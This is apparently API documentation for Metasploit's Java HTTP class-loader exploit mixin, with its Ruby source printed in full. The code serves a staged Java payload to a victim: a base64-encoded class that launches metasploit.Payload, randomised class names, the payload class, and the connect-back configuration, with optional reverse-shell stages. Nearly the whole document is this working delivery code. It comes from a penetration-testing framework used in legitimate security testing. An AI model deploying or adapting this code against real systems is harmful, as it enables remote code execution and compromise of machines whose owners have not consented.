Module: Msf::Exploit::Remote::Java::HTTP::ClassLoader
- Includes:
- HttpServer
- Defined in:
- lib/msf/core/exploit/remote/java/http/class_loader.rb
Instance Attribute Summary
Attributes included from SocketServer
Instance Method Summary collapse
- #class_name ⇒ Object
-
#constructor_class ⇒ Object
import metasploit.Payload;.
- #initialize(info = {}) ⇒ Object
- #java_class_loader_on_request_uri(cli, request) ⇒ Object
- #java_class_loader_resource_uri ⇒ Object
- #java_class_loader_start_service(opts = {}) ⇒ Object
- #packed_class_name ⇒ Object
Methods included from HttpServer
#add_resource, #add_robots_resource, #autofilter, #check_dependencies, #cleanup, #cli, #cli=, #close_client, #create_response, #fingerprint_user_agent, #get_resource, #get_uri, #hardcoded_uripath, #on_request_uri, #print_prefix, #random_uri, #regenerate_payload, #remove_resource, #report_user_agent, #resource_uri, #send_local_redirect, #send_not_found, #send_redirect, #send_response, #send_robots, #srvhost_addr, #srvport, #start_service, #use_zlib
Methods included from Auxiliary::Report
#active_db?, #create_cracked_credential, #create_credential, #create_credential_and_login, #create_credential_login, #db, #db_warning_given?, #get_client, #get_host, #inside_workspace_boundary?, #invalidate_login, #mytask, #myworkspace, #myworkspace_id, #report_auth_info, #report_client, #report_exploit, #report_host, #report_loot, #report_note, #report_service, #report_vuln, #report_web_form, #report_web_page, #report_web_site, #report_web_vuln, #store_cred, #store_local, #store_loot
Methods included from Metasploit::Framework::Require
optionally, optionally_active_record_railtie, optionally_include_metasploit_credential_creation, #optionally_include_metasploit_credential_creation, optionally_require_metasploit_db_gem_engines
Methods included from TcpServer
#on_client_close, #on_client_connect, #ssl, #ssl_cert, #ssl_cipher, #ssl_compression, #ssl_version, #start_service
Methods included from SocketServer
#_determine_server_comm, #bindhost, #bindport, #cleanup, #cleanup_service, #exploit, #on_client_data, #primer, #regenerate_payload, #srvhost, #srvport, #start_service, #via_string
Instance Method Details
#class_name ⇒ Object
128 129 130 |
# File 'lib/msf/core/exploit/remote/java/http/class_loader.rb', line 128 def class_name @class_name ||= rand_text_alpha(8..42).capitalize end |
#constructor_class ⇒ Object
import metasploit.Payload;
public class Metasploit {
public Metasploit() {
try {
Payload.main(null);
}
catch (Exception e) {}
}
}
112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 |
# File 'lib/msf/core/exploit/remote/java/http/class_loader.rb', line 112 def constructor_class klass = Rex::Text.decode_base64( <<~EOF yv66vgAAADMAFQoABQAMCgANAA4HAA8HABAHABEBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAN U3RhY2tNYXBUYWJsZQcAEAcADwwABgAHBwASDAATABQBABNqYXZhL2xhbmcvRXhjZXB0aW9u AQAKTWV0YXNwbG9pdAEAEGphdmEvbGFuZy9PYmplY3QBABJtZXRhc3Bsb2l0L1BheWxvYWQB AARtYWluAQAWKFtMamF2YS9sYW5nL1N0cmluZzspVgAhAAQABQAAAAAAAQABAAYABwABAAgA AAA3AAEAAgAAAA0qtwABAbgAAqcABEyxAAEABAAIAAsAAwABAAkAAAAQAAL/AAsAAQcACgAB BwALAAAA EOF ) # Replace length-prefixed string "Metasploit" with a random one klass.sub("\x00\x0aMetasploit", packed_class_name) end |
#initialize(info = {}) ⇒ Object
12 13 14 15 16 |
# File 'lib/msf/core/exploit/remote/java/http/class_loader.rb', line 12 def initialize(info = {}) super(update_info(info, 'Stance' => Msf::Exploit::Stance::Aggressive )) end |
#java_class_loader_on_request_uri(cli, request) ⇒ Object
41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 |
# File 'lib/msf/core/exploit/remote/java/http/class_loader.rb', line 41 def java_class_loader_on_request_uri(cli, request) vprint_status("#{request.method} #{request.uri} requested") unless %w[HEAD GET].include?(request.method) vprint_error("Ignoring #{request.method} request") return end resource = request.raw_uri.delete_prefix(java_class_loader_resource_uri) if request.method == 'HEAD' whitelist = %W[ #{class_name}.class metasploit/Payload.class metasploit.dat ] unless whitelist.include?(resource) vprint_error('Sending 404') return send_not_found(cli) end vprint_good('Sending 200') return send_response(cli, '') end case resource # Stage 1 when "#{class_name}.class" vprint_good('Sending the constructor class') # This contains the constructor that will call our JavaPayload res = constructor_class # Stage 2 when 'metasploit/Payload.class' vprint_good('Sending the main payload class') # This is our JavaPayload as a compiled class res = MetasploitPayloads.read('java/metasploit/Payload.class') # Stage 3 when 'metasploit.dat' vprint_good('Sending the payload configuration data') # This tells the target how to address the payload; this is the magic! res = payload_instance.stager_config # (Optional) Stage 4 data for unstaged payloads such as java/shell_reverse_tcp when /^javapayload\/stage\/(?:Shell|Stage|StreamForwarder)\.class$/ vprint_good("Sending additional payload class: #{resource}") res = MetasploitPayloads.read("java/#{resource}") else vprint_error('Sending 404') return send_not_found(cli) end send_response( cli, res, # file -I says application/x-java-applet, but I don't believe it 'Content-Type' => 'application/octet-stream' ) end |
#java_class_loader_resource_uri ⇒ Object
33 34 35 36 37 38 39 |
# File 'lib/msf/core/exploit/remote/java/http/class_loader.rb', line 33 def java_class_loader_resource_uri return @java_class_loader_resource_uri if @java_class_loader_resource_uri # the resource URI must end in / for the class loading to work path = resource_uri path += '/' unless path.end_with?('/') @java_class_loader_resource_uri = path end |
#java_class_loader_start_service(opts = {}) ⇒ Object
18 19 20 21 22 23 24 25 26 27 28 29 30 31 |
# File 'lib/msf/core/exploit/remote/java/http/class_loader.rb', line 18 def java_class_loader_start_service(opts = {}) # XXX: This is a workaround until we can take SSL in opts ssl = datastore['SSL'] datastore['SSL'] = false opts['Uri'] = { 'Proc' => Proc.new { |cli, req| java_class_loader_on_request_uri(cli, req) }, 'Path' => opts['Path'] || java_class_loader_resource_uri }.update(opts['Uri'] || {}) start_service(opts) datastore['SSL'] = ssl get_uri end |
#packed_class_name ⇒ Object
132 133 134 |
# File 'lib/msf/core/exploit/remote/java/http/class_loader.rb', line 132 def packed_class_name "#{[class_name.length].pack('n')}#{class_name}" end |